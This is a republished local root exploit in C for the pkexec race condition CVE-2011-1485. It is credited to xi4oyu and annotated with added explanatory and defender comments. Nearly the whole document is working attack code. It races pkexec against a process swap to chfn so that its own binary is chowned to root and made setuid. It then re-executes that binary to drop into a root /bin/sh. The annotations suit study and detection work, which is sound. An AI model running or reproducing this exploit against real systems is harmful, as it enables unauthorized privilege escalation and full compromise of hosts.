pkexec Race Condition Privilege Escalation Exploit
来源:http://www.wooyun.org 作者:xi4oyu 发布时间:2011-10-09  

/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us  @ http://www.wooyun.org :)
*/
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>

 

/*
 * main — proof-of-concept for the pkexec race named in the file header
 * (CVE-2011-1485; see the header comment above).  argc is unused.
 *
 * Flow, as visible below:
 *   1. Resolve argv[0] to real_path and build cmd_buff, a shell command
 *      that would chown root:root / chmod 4755 this very binary.
 *   2. If already running with euid 0 (i.e. re-executed after step 4
 *      succeeded), exec /bin/sh and stop.
 *   3. Loop up to 500 times: fork a child that creates pipe2/pipe3 and
 *      forks again.  The grandchild execs pkexec with stdout/stderr sent
 *      into pipe1; the child (pkexec's parent process) execs /usr/bin/chfn
 *      after a tunable delay.  The two handshake over pipe2/pipe3 so the
 *      delay starts only once the grandchild is about to exec.  The
 *      top-level process polls pipe1 for pkexec's output and nudges the
 *      delay (usleep1/usleep2) depending on whether "does not match"
 *      appeared in it.
 *   4. After each attempt, stat real_path; once it is root-owned and has
 *      the setuid bit set, re-exec it (which lands in step 2).
 *
 * Return: 0 when the loop ends without success (never reached on success,
 * since execve replaces the process).
 *
 * Defender notes (grounded in the code, not the CVE text): a successful run
 * leaves the binary at real_path owned root:root with mode 4755 — a setuid
 * scan / file-integrity finding.  main never calls wait()/waitpid(), so a
 * run shows up as a burst of short-lived pkexec and chfn processes plus
 * zombie children of the exploit process.
 */
int main(int argc,char *argv[], char ** envp)
{
 
 time_t tim_seed1;
 pid_t pid_seed2;
 int result;
 struct stat stat_buff;
 
 char * chfn_path = "/usr/bin/chfn";   /* never referenced below; chfn_argv carries the literal */
 char cmd_buff[4096];                  /* shell command handed to pkexec (filled by snprintf) */
 
 char * pkexec_argv[] = {
  "/usr/bin/pkexec",
  "/bin/sh",
  "-c",
  cmd_buff,
  NULL
 };
 int pipe1[2];  /* grandchild (pkexec) stdout/stderr -> top-level process */
 int pipe2[2];  /* grandchild -> child: "ready to exec pkexec" */
 int pipe3[2];  /* child -> grandchild: "go"; the parent later reuses these 8 bytes as pollfd storage */
 pid_t pid,pid2 ;
 char * chfn_argv[] = {
  "/usr/bin/chfn",
  NULL
 };

 char buff[8];           /* one-byte handshake scratch */
 char read_buff[4096];   /* pkexec output captured from pipe1 */
 char real_path[512];    /* canonical path of this executable (from argv[0]) */
 struct termios termios_p;
 
 int count = 0;
 int flag = 0;
 int usleep1 = 0;   /* coarse delay before the child execs chfn; adjusted +/-500 per attempt */
 int usleep2 = 0;   /* random jitter added to usleep1 */

 
 bzero(cmd_buff,4096);   /* bzero is declared in <strings.h>, which this file does not include */
 bzero(real_path,512);
 realpath(argv[0],real_path);   /* return value unchecked: on failure real_path content is unreliable */
 
 tim_seed1 = time(NULL);
 pid_seed2 = getpid();
 srand(tim_seed1+pid_seed2);   /* seeds rand() used for the usleep2 jitter */
 

 
 
 //get terminal attr
 tcgetattr(0,&termios_p);   /* saved so the terminal can be restored with tcsetattr() after each attempt */
 snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
// printf("Cmd line:%s",cmd_buff);
 if(! geteuid()){
 //Succs => r00t!
 /* Second entry: this process was re-exec'd from the now-setuid copy (see the stat() check below). */
  char * exec_argv[2]={
   "/bin/sh",
   NULL
  };
  setuid(0);
  setgid(0);
  execve("/bin/sh",exec_argv,0);   /* envp is NULL: the shell starts with an empty environment */
  perror("execve shell");
  exit(-1);
 }

 printf("pkexec local root exploit by xi4oyu , thx to dm\n");
 
 if(pipe(pipe1)){
  perror("pipe");
  exit(-2);
 }
 
 for(count = 500; count && !flag; count--){
 
 // printf("Count %d\n",count);
  pid = fork();
  if( !pid ){
   // fork() returned 0: this is the CHILD (the original comment labelled it "Parent")
   if( !pipe(pipe2)){
   
    if(!pipe(pipe3)){
     pid2 = fork();
     if(!pid2){
      // Grandchild: runs pkexec with stdout/stderr redirected into pipe1 for the top-level poll()
      close(1);
      close(2);
      close(pipe1[0]);
      dup2(pipe1[1],2);
      dup2(pipe1[1],1);
      close(pipe1[1]);
      close(pipe2[0]);
      close(pipe3[1]);
      write(pipe2[1],"\xFF",1);   /* signal the child that we are ready ... */
      read(pipe3[0],&buff,1);     /* ... and block until it releases us */
          
      execve(pkexec_argv[0],pkexec_argv,envp);
      perror("execve pkexec");
      exit(-3);
     
     }
     close(0);
     close(1);
     close(2);
     close(pipe2[1]);
     close(pipe3[0]);
     read(pipe2[0],&buff,1);     /* wait for the grandchild's ready byte */
     write(pipe3[1],"\xFF",1);   /* release the grandchild */
     usleep(usleep1+usleep2);    /* tuned delay; the int sum is converted to useconds_t here, and usleep1 may be negative by now */

     /* The child — pkexec's parent process — replaces its image with chfn while pkexec is
      * running; presumably this is the parent-process swap the header's race refers to
      * (confirm against the CVE-2011-1485 description). */
     execve(chfn_argv[0],chfn_argv,envp);
     perror("execve setuid");
     exit(1);
    }
    

   }
   perror("pipe3");   /* reached when either pipe2 or pipe3 failed; the message names only pipe3 */
   exit(1);    
  }
  
  //Note: this is the PARENT (fork() returned the child's pid; the original comment said "child").
  // pipe3 is unused here, so its 8 bytes are reused as storage for a struct pollfd on pipe1[0].
  memset(pipe3,0,8);
  
  struct pollfd * pollfd = (struct pollfd *)(&pipe3);   /* type-puns int[2] as struct pollfd: relies on sizeof(struct pollfd)==8 and violates strict aliasing */
  pollfd->fd = pipe1[0];
  pollfd->events =  POLLRDNORM;
  
  if(poll(pollfd,1,1000) < 0){   /* wait up to 1000 ms for pkexec output */
  
   perror("poll");
   exit(1);
  }
  
  if(pollfd->revents & POLLRDNORM ){
   memset(read_buff,0,4096);
   read(pipe1[0],read_buff,4095);   /* at most 4095 bytes, so read_buff stays NUL-terminated for strstr() */
   if( strstr(read_buff,"does not match")){
    usleep1 += 500;                /* pkexec reported a mismatch: lengthen the delay and add jitter */
    usleep2 = rand() % 1000;
   
   }else{
    usleep1 -= 500;                /* no mismatch text: shorten the delay (nothing stops this going below zero) */
    
   
   }
  
  
  }
  
  if(!stat(real_path,&stat_buff)){
   if(!stat_buff.st_uid){            /* owned by root ... */
    if(!stat_buff.st_gid){           /* ... group root ... */
     if(stat_buff.st_mode & 0x800){  /* ... and setuid: 0x800 == 04000 == S_ISUID */
      
      char *exec_array[]={
       real_path,
       NULL
      };
      
      flag = 1;   /* only observable if the execve below fails, and that path exits anyway */
      tcsetattr(0,2,&termios_p);   /* 2 == TCSAFLUSH on Linux: restore the terminal before exec */
      execve(real_path,exec_array,0);   /* re-run ourselves as the setuid copy; lands in the geteuid()==0 branch above */
      perror("execve self");
      exit(1);
     }
    }
   
   }
  }
  
  tcsetattr(0,2,&termios_p);   /* restore terminal attrs after each attempt (children may have altered them) */
 
 }
  result = 0;
  return result;   /* loop exhausted without success; no wait() was ever done on the children */

}


 